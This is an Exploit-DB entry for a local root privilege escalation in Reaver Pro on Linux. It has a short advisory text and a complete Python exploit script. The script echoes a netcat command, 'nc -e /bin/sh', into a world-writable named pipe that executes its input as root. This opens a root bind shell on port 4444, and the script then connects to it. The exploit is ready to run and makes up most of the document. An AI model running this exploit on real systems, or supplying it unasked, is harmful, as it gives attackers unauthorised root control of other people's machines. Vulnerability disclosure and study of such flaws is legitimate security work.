Reaver Pro - Local Privilege Escalation

EDB-ID:

37898

CVE:

N/A


Author:

infodox

Type:

local


Platform:

Linux

Date:

2012-09-30


source: https://www.securityfocus.com/bid/55725/info

Reaver Pro is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. 

#!/usr/bin/env python
import os
print """
          Reaver Pro Local Root
   Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
    Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")